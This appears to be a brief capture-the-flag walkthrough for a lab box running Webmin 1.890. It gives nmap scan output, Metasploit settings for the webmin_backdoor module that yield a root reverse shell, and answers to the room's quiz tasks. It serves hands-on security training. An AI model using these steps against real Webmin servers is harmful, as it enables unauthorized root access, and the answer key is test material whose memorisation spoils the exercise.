Hi guys, today I will show you how easy this boxes are in a very simple explanation both AttackerKD&Source.
1 - Enumeration
2 - Exploitation
3- Reverse shell
4-AttackerKB Tasks
Enumeration
Nmap -T4 -A -v -Pn $IP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
Exploitation
One of the attached files of vulnerability is metasploit module that will allow us reverse shell the box so let open Metasploit:
run msfconsole. Then search "the exploit name or version"
Then choose unix/webapp/webmin_backdoor
Then: RHOSTS : $IP
RPORT: Box-port
LHOST: Your-ip
SSL : 1
Reverse shell
Run the exploit and you'll get a shell.
Voila session opened we are root so let check the hints and hunt the flags.
User flag:
Root flag:
Task 2 - Discovering the lay of the land:
From Nmap results we can find all our answers...
Answers:
#2-Webmin
#3-1.890
#4- from cert bellow figure it out
Task 3 - Learning to fly:
Just explore AttackerHB then we will be able to answer the following "important to copy directly from AttackerKB site"
Answers:
#3 1.890
#4 supply chain
#5 aug172019
#6 githubfileinthetitle
Thank you! for all...
Post a Comment
Comments here, cracks!